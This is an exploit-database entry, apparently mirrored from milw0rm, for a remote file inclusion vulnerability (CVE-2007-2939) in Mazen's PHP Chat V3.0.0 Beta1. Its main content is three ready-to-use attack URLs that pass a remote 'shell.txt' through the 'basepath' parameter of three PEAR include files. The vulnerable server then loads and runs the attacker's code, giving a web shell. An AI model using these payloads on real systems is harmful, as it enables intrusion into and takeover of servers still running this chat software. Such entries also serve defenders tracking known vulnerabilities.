[] NeoSense
E X P L O I T S
title author type platform port cve id

Mazens PHP Chat V3 (basepath) - Remote File Inclusion

Author: ThE TiGeR
type: webapps
platform: php
port: 
date_added: 2007-05-25 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-38088;CVE-2007-2939;OSVDB-38087;OSVDB-38086 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commazen_phpopenchmt221.tar.gz
#Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion

#Download script : http://www.scriptbrasil.com.br/script/php/bate_papo/mazen_phpopenchmt221.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# milw0rm.com [2007-05-26]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.